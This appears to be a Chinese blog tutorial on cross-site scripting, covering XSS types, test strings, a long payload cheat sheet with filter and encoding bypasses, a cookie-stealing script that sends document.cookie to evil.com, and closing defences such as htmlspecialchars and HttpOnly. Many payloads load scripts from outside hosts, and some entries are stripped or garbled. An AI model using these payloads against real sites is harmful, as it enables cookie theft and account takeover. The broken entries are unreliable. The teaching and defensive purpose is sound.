百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术文章 > 正文

网络安全之从原理看懂XSS(网络安全15个细分方向)

myzbx 2025-03-24 18:30 43 浏览

01、XSS的原理和分类

跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆

故将跨站脚本攻击缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的,XSS攻击针对的是用户层面的攻击;

XSS分为:存储型,反射型,DOM型XSS


存储型XSS:存储型XSS,持久化,代码是存储在服务器中,如在个人信息或发表文章等地方,插入代码,如果没有过滤或者过滤不严,那么这些代码将储存到数据库中,用户访问该页面的时候出发代码执行,这种XSS比较危险,容易造成蠕虫,盗取Cookie;

反射型XSS:非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面,反射性XSS大多数是用来盗取用户的Cookie信息;

DOM型XSS:不经过后端,DOM-XSS漏洞是基于文档对象模型(Document Object Model ,DOM)的一种漏洞,DOM-XSS是用过url传入参数取控制触发的,其实也属于反射型XSS,DOM的详解:DOM文档对象模型;

【一一帮助安全学习,所有资源关注我,私信回复“资料”获取一一】
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

可能触发DOM型XSS的属性

document.referer
window.name
location
innerHTML
documen.write

02、XSS攻击的危害

1、盗取各类用户账号,如机器登陆账号,用户网银账号,各类管理员账号;
2、控制企业数据,包括读取,篡改,添加,删除企业敏感数据的能力;
3、盗取企业重要的具有商业价值的资料;
4、非法转账;
5、强制发送电子邮件;
6、网站挂马;
7、控制受害者机器向其他网站发起攻击;

03、XSS的测试语句

在网站是否存在XSS漏洞时,应该输入一些标签,如<,>输入后查看网页源代码是否过滤标签,如果没有过滤,很大可能存在XSS漏洞。

常用测试语句:

1

1

可以看到,网站并没有对标签进行过滤;
<script>console.log(1);</script>

可以看到,并没有弹出,但是控制台上输出了1,我们可以确定,确实存在XSS;

闭合问题:很多时候,在测试XSS的时候,想要要考虑到闭合问题,我们首先查看网页的源代码,需要首先判断出来,网站用的时单引号闭合还是双引号闭合;

">x<"

'>x<'

单行注释:

">x//#双斜杠表示注释掉后面的语句

0x04、XSS攻击语句

输入检测确定标签没有过滤,为了显示漏洞存在,需要插入XSS攻击代码;

<script>alert(1)</script>


aa

(1)普通的 XSS JavaScript 注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2)IMG 标签 XSS 使用 JavaScript 命令

(3)IMG 标签无分号无引号

(4)IMG 标签大小写不敏感

(5)HTML 编码(必须有分号)

(6)修正缺陷 IMG 标签
<SCRIPT>alert("XSS")</SCRIPT>">
(7)formCharCode 标签(计算器)

(8)UTF-8 的 Unicode 编码(计算器)

(9)7 位的 UTF-8 的 Unicode 编码是没有分号的(计算器)

(10)十六进制编码也是没有分号(计算器)

(11)嵌入式标签,将 Javascript 分开

(12)嵌入式编码标签,将 Javascript 分开

(13)嵌入式换行符

(14)嵌入式回车

(15)嵌入式多行注入 JavaScript,这是 XSS 极端的例子

(16)解决限制字符(要求同页面)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+'src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17)空字符 12-7-1 T00LS - Powered by Discuz! Board

https://www.a.com/viewthread.php?action=printable&tid=15267 2/6perl-e 'print "";' > out

(18)空字符 2,空字符在国内基本没效果.因为没有地方可以利用
perl -e 'print "alert(\"XSS\")";' > out
(19)Spaces 和 meta 前的 IMG 标签

(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21)Non-alpha-non-digit XSS to 2


(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23)双开括号
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT
SRChttp://3w.org/XSS/xss.js?

(25)无结束脚本标记 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26)半开的 HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27)双开角括号
<iframe src=http://3w.org/XSS.html <
(28)无单引号 双引号 分号
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
(29)换码过滤的 JavaScript
\";alert('XSS');//
(30)结束 Title 标签
<SCRIPT>alert("XSS");</SCRIPT>
(31)Input Image

(32)BODY Image

(33)BODY 标签

(34)IMG Dynsrc

(35)IMG Lowsrc

(36)BGSOUND

(37)STYLE sheet

(38)远程样式表

(39)List-style-image(列表式)

  • XSS
    (41)META 链接 url

    (42)Iframe

    (43)Frame

    
    12-7-1 T00LS - Powered by Discuz!
    Boardhttps://www.a.com/viewthread.php?action=printable&tid=15267 3/6
    

    (44)Table


    (45)TD

    (46)DIV background-image

    (47)DIV background-image 后加上额外字符
    (1-32&34&39&160&8192-8&13&12288&65279) **
    **
    (48)DIV expression

    (49)STYLE 属性分拆表达

    (50)匿名 STYLE(组成:开角号和一个字母开头)

    (51)STYLE background-image

    (52)IMG STYLE 方式
    exppression(alert("XSS"))'>
    (53)STYLE background

    
    (54)BASE
    <BASE HREF="javascript:alert('XSS');//">
    

    (55)EMBED 标签,你可以嵌入 FLASH,其中包涵 XSS
    <EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
    (56)在 flash 中使用 ActionScrpt 可以混进你 XSS 的代码
    a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval_r(a+b+c+d);
    (57)XML namespace.HTC 文件必须和你的 XSS 载体在一台服务器上
    <?import namespace="xss"
    implementation="http://3w.org/XSS/xss.htc">XSS
    (58)如果过滤了你的 JS 你可以在图片里添加 JS 代码来利用
    <SCRIPT SRC=""></SCRIPT>
    (59)IMG 嵌入式命令,可执行任意命令

    (60)IMG 嵌入式命令(a.jpg 在同服务器)
    Redirect 302 /a.jpg
    http://www.XXX.com/admin.asp&deleteuser

    (61)绕符号过滤·
    <SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
    (62)<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
    (63)<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
    (64)<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
    (65)<SCRIPT a=> SRC="http://3w.org/xss.js"></SCRIPT>
    (66)

    12-7-1 T00LS - Powered by Discuz! Board
    https://www.a.com/viewthread.php?action=printable&tid=15267 4/6<SCRIPT a=">'>"
    SRC="http://3w.org/xss.js"></SCRIPT>
    

    (67)

    <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
    

    (68)URL 绕行
    XSS
    (69)URL 编码
    XSS
    (70)IP 十进制
    XSS
    (74)节省[http:]
    XSS
    (75)节省[www]
    XSS
    (76)绝对点绝对 DNS
    XSS
    (77)javascript 链接
    XSS

    各个标签的的攻击语句;

    <script>alert("hack")</script>   #弹出hack
    <script>alert(/hack/)</script>   #弹出hack
    <script>alert(1)</script>        #弹出1,对于数字可以不用引号
    <script>alert(document.cookie)</script>      #弹出cookie
    <script src=http://xxx.com/xss.js></script>  #引用外部的xss
    
    

    svg标签:

    
    <svg onload="alert(1)"//
    
    

    标签:

    
      #弹出cookie
    
    

    标签:

    
    
    
    

    video 标签:

    style标签:

    
    
    

    05、XSS漏洞的挖掘

    5.1、黑盒测试

    尽可能找到一切用户可控并且能够输出在页面代码中的地方,比如下面这些:

    • URL的每一个参数
    • URL本身
    • 表单
    • 搜索框

    5.2、常见业务场景

    • 重灾区:评论区,留言区,个人信息,订单信息等
    • 针对型:站内信,网页及时通讯,私信,意见反馈
    • 存在风险:搜索框,当前目录,图片属性等;

    5.3、白盒审计

    关于XSS的代码审计主要就是从接收参数的地方和一些关键此入手;

    PHP中常见的接收参数的方法有_GET,GET,_POST,$_REQUEST等等,可以搜索所有接收参数的方法,然后对接收到的数据进行跟踪,看看有没有输出到页面中,然后看看输出到页面中的数据是否进行了过滤和html编码等处理

    也可以搜索类似echo这样的输出语句,跟踪输出的变量是从哪里来的,我们是否能控制,如果从数据库中取得,是否能控制存到数据库得数据,存到数据库之前有没有得到过滤等等;

    大多数程序会对接收参数封装在公共文件得函数中统一调用,我们就需要审计这些公共函数看有没有过滤,能否绕过等等;

    同理审计DOM型注入可以搜索一些js操作DOM元素得关键字进行审计;

    06、XSS的攻击过程

    6.1、反射型XSS漏洞:

    1、Alice经常浏览某个网站,此网站为Bob所拥有,Bob的站点需要Alice使用用户名、密码进行登陆,并存储了Ailce敏感信息(比如银行账户);

    2、Tom发现Bob的站点存在反射的XSS漏洞;

    3、Tom利用Bob网站的反射型XSS漏洞编写了一个exp,做成链接的形式,并利用各种手段诱导Alice点击

    4、Alice在登陆Bob的站点后,浏览了Tom提供的恶意链接;

    5、嵌入到恶意链接中的恶意脚本在Alice的浏览器中执行,此脚本盗取敏感信息(cookie,账号等信息),然后在Alice完全不知情的情况下将这些信息发送给了Tom;

    6、Tom利用获取到的Cookie就可以以Alice的身份信息登陆Bob的站点,如果脚本的功能更强大的化,Tom还可以对Alice的浏览器做控制并进一步利用漏洞控制;

    6.2、存储型XSS漏洞:

    1、Bob拥有一个Web站点,该站点允许用户发布信息,浏览已发布的信息;

    2、Tom检测到Bob的站点存在存储型的XSS漏洞;

    3、Tom在Bob的网站发布了一个带有恶意脚本的热点信息,该热点信息存储在了Bob的服务器的数据库中,然后吸引其他用户来阅读该热点信息;

    4、Bob或者时任何的其他人,如Alice浏览了该信息之后,Tom的恶意脚本就会执行;

    5、Tom的恶意脚本执行后,Tom就可以对浏览器该页面的用户发起一次XSS攻击;

    07、XSS攻击测试

    7.1、远程加载攻击payload

    XSS漏洞能够通过构造恶意的XSS语句实现很多功能,其中做常用的时,构建XSS恶意代码获取对方浏览器的COOKIE;

    1)我们首先把恶意代码保存在本地kali里面,实战情况下,我们将代码保存在我们的服务器上;

    var img=document.createElement("img");
    img.src="http://www.evil.com/log?"+escape(document.cookie);
    document.body.appendChild(img);
    
    

    2)我们在kali,用python开启http服务;

    python -m http.server 80

    3)我们在有XSS漏洞的地方,远程加载我们的恶意代码:
    <script src="<br>http://192.168.61.128/xss.js"></script>

    看到浏览器加载了,我们的xss恶意代码;

    4)成功获取到了cookie信息

    5)图片创建链接

    
    
    

    6)字符拼接

    这种一般是输入的字符有限制的时候使用

    <script>z='document.'</script>
    <script>z=z+'write("'</script>
    <script>z=z+'<script'</script>
    <script>z=z+' src=ht'</script>
    <script>z=z+'tp://www.'</script>
    <script>z=z+'xsstools'</script>
    <script>z=z+'.com/a'</script>
    <script>z=z+'mER></sc'</script>
    <script>z=z+'ript>")'</script>
    <script>eval(z)</script>
    有的情况要用/**/注释不需要的代码。
    
    

    7)jQuery加载

    <script>$.getScript("//www.xsstools.com/amER");</script>
    
    

    7.2、反射型XSS:

    //前端 1.html:
    
    
        
        反射型XSS
    
    
        
    //后端 action.php:

    我们接着在输入框输入:<script>alert(/xss/)</script>

    页面直接弹出了xss的页面,可以看到, 我们插入的语句已经被页面给执行了,这就是最基本的反射型XSS漏洞,这种漏洞流向:前端–>后端–>前端

    7.3、存储型XSS:

    //前端:2.html
    
    
        
        存储型XSS
    
    
        
    输入你的ID:
    输入你的Name:
    //后端:action2.php //供其他用户访问页面:show2.php

    这里有一个用户提交页面,数据提交给后端之后,后端存储在数据库中,然后当其他用户访问另一个页面的时候,后端调出该数据,显示给另一个用户,XSS代码就被执行了;

    我们输入3和<script>alert(/xss/)</script>,接着,我们看看数据库;

    可以看到,我们的XSS语句已经插入到数据库中了;

    然后当其他用户访问,show2.php页面的时候,我们插入的XSS代码就执行了;

    存储型XSS的数据流向是:前端–>后端–>数据库–>后端–>前端

    7.4、DOM型XSS

    先放源代码:

    // 前端3.html
    
      
      
      DOM型XSS
      
      
      
    // 后端action3.php
    <script type="text/javascript"> var text=document.getElementById("text"); var print=document.getElementById("print"); print.innerHTML=text.value; // 获取 text的值,并且输出在print内。这里是导致xss的主要原因。 </script>

    这里有一个提交页面,用户可以在此提交数据,数据提交之后,给后台处理;

    我们可以输入,然后看看页面的变化;

    页面直接弹出了hack的页面,我们插入的语句已经被页面给执行了;

    这就是DOM型XSS的漏洞,这种漏洞的数据流向是:前端–>浏览器

    08、XSS编码绕过

    8.1、gpc过滤字符

    如果gpc开启的时候,特殊字符会被加上斜杠即,‘变成’,xss攻击代码不要用带单引号和双引号;

    绕过gpc在php高版本gpc默认是没有的,但是开发程序员会使用addcslashes()对特殊字符进行转义;
    <script src='<br>http://www.xss123.com/JGdbsl?1623638390'></script>这个是执行不了的
    <script src=
    http://www.xss123.com/JGdbsl?1623638390></script>
    没有单引号可执行

    8.2、过滤alert

    当页面过滤alert这个函数时,因为这个函数会弹窗,不仅很多程序会对他进行过滤,而且很多waf都会对其进行拦截,所以不存在alert即可;

    <script>prompt(/xss/);</script>
    <script>confirm(1);</script>
    <script src=http://www.xss123.com/eciAKJ?1623635663></script>
    
    

    8.3、过滤标签

    在程序里如果使用了html实体过滤,在php会使用htmlspecialchars()对输入的字符进行实体化,实体化之后的字符不会在html执行,把预定义的字符"<“(小于)和”>"(大于)转化为HTML实体,构造xss恶意代码大多数都必须使用<或者>,这两个字符被实体化之后,html里就不能执行了;

    预定义的字符是:

    &(和号)成为&

    “(双引号)成为"

    ’(单引号)成为'

    <(小于)成为<

    ·>(大于)成为>

    但是又在input这些标签里是不用考虑标签实体化,因为用不上<>这两个标签,

    8.4、ascii编码

    <script>alert(String.fromCharCode(88,83,83))</script>

    8.5、url编码

    123

    8.6、JS编码

    编码直通车:
    https://www.jb51.net/tools/zhuanhuan.htm

    八进制编码:
    <script>eval("\141\154\145\162\164\50\61\51");</script>

    16进制编码
    <script>eval("\x61\x6c\x65\x72\x74\x28\x31\x29")</script>

    jsunicode编码
    <script>\u0061\u006c\u0065\u0072\u0074('xss');</script>

    8.7、HTML编码

    在=后可以解析html编码

    十进制:

    十六进制

    ''
    
    

    8.8、base64编码

    使用伪协议base64解码执行xss

    111
    <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
    
    
    

    0x09、XSS的防御

    XSS防御的总体思路是:对用户的输入(和URL参数)进行过滤,对输出进行html编码,也就是对用户提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容,然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行;

    对输入的内容进行过滤,可以分为黑名单和白名单过滤,黑名单过滤虽然可以拦截大部分的XSS攻击,但是还是存在被绕过的风险,白名单过滤虽然可以基本杜绝XSS攻击,但是真实环境中一般是不能进行如此严格的白名单过滤的;

    对输出进行html编码,就是通过函数,将用户的输入的数据进行html编码,使其不能作为脚本运行;

    如下是使用php中的htmlspecialchars函数对用户输入的name参数进行html编码,将其转化为html实体;

    #使用htmlspecialchars函数对用户输入的name参数进行html编码,将其转换为html实体
    $name = htmlspecialchars( $_GET[ 'name' ] );
    
    

    我们还可以服务端设置会话Cookie的HTTP Only属性,这样客户端的JS脚本就不能获取Cookie信息了;

    相关推荐

    零基础入门AI智能体:详细了解什么是变量类型、JSON结构、Markdown格式

    当品牌跳出固有框架,以跨界联动、场景创新叩击年轻群体的兴趣点,一场关于如何在迭代中保持鲜活的探索正在展开,既藏着破圈的巧思,也映照着与新一代对话的密码。在创建AI智能体时,我们会调用插件或大模型,而在...

    C# 13模式匹配:递归模式与属性模式在真实代码中的性能影响分析

    C#13对模式匹配的增强让复杂数据处理代码更简洁,但递归模式与属性模式的性能差异一直是开发者关注的焦点。在实际项目中,选择合适的模式不仅影响代码可读性,还可能导致执行效率的显著差异。本文结合真实测试...

    零基础快速入门 VBA 系列 6 —— 常用对象(工作簿、工作表和区域)

    上一节,我介绍了VBA内置函数以及如何自动打字和自动保存文件。这一节,我们来了解一下Excel常用对象。Excel常用对象Excel有很多对象,其中最常用也最重要的包括以下3个:1.Workbo...

    不同生命数字的生肖龙!准到雷普!

    属龙的人总在自信爆棚和自讨苦吃之间反复横跳?看完这届龙宝宝的日常我悟了。属龙的人好像天生自带矛盾体:领导力超强可人缘时好时坏,工作雷厉风行却总在爱情里翻车。关键年份的龙性格差异更大——76年龙靠谱但不...

    仓颉编程语言基础-面向对象编程-属性(Properties)

    属性是仓颉颉中一种强大的机制,它允许你封装对类(或接口interface、结构体struct、枚举enum、扩展extend)内部状态的访问。它看起来像一个普通的成员变量(字段),但在其背后,它通过...

    Python中class对象/属性/方法/继承/多态/魔法方法详解

    一、基础入门:认识类和对象1.类和对象的概念在Python中,类(class)是一种抽象的概念,用于定义对象的属性和行为,而对象(也称为实例)则是类的具体表现。比如,“汽车”可以是一个类,它有...

    VBA基础入门:搞清楚对象、属性和方法就成功了一半

    如果你刚接触VBA(VisualBasicforApplications),可能会被“对象”“属性”“方法”这些术语搞得一头雾水。但事实上,这三个概念是VBA编程的基石。只要理解它们之间的关系,...

    P.O类型文推荐|年度编推合集(一百九十五篇)

    点击左上方关注获取更多精彩推文目录2019年度编推35篇(1V1)《悖论》作者:流苏.txt(1V1)《桂花蒸》作者:大姑娘浪.txt(1V1)《豪门浪女》作者:奚行.txt...

    Python参数传递内存大揭秘:可变对象 vs 不可变对象

    90%的Python程序员不知道,函数参数传递中可变对象的修改竟会导致意想不到的副作用!一、参数传递的本质:对象引用传递在Python中,所有参数传递都是对象引用的传递。这意味着函数调用时传递的不是对...

    JS 开发者必看!TC39 2025 最新动向,这些新语法要火?

    大家好,很高兴又见面了,我是"高级前端进阶",由我带着大家一起关注前端前沿、深入前端底层技术,大家一起进步,也欢迎大家关注、点赞、收藏、转发,您的支持是我不断创作的动力。TC39第...

    2025 年值得尝试的 5 个被低估的 JavaScript 库

    这些JavaScript库可能不会在社交媒体或HackerNews上流行起来,但它们会显著提高您的工作效率和代码质量。JavaScript不再只是框架。虽然React、Vue和Sv...

    Python自动化办公应用学习笔记30—函数的参数

    一、函数的参数1.形参:o定义:在函数定义时,声明在函数名后面括号中的变量。o作用:它们是函数内部的占位符变量,用于接收函数被调用时传入的实际值。o生命周期:在函数被调用时创建,在函数执...

    16种MBTI人格全解析|测完我沉默了三秒:原来我是这样的人?

    MBTI性格测试火了这么久,你还不知道自己是哪一型?有人拿它当社交话题,有人拿它分析老板性格,还有人干脆当成择偶参考表。不废话,今天我一次性给你整理全部16种MBTI人格类型!看完你不仅能知道自己是谁...

    JS基础与高级应用: 性能优化

    在现代Web开发中,性能优化已成为前端工程师必须掌握的核心技能之一。本文从URL输入到页面加载完成的全过程出发,深入分析了HTTP协议的演进、域名解析、代码层面性能优化以及编译与渲染的最佳实践。通过节...

    爱思创CSP-J/S初赛模拟赛线上开赛!助力冲入2024年CSP-J/S复赛!

    CSP-J/S组初赛模拟赛爱思创,专注信奥教育19年,2022年CSP-J/S组赛事指定考点,特邀NOIP教练,开启全真实CSP-J/S组线上初赛模拟大赛!一、比赛对象:2024年备考CSP-J/S初...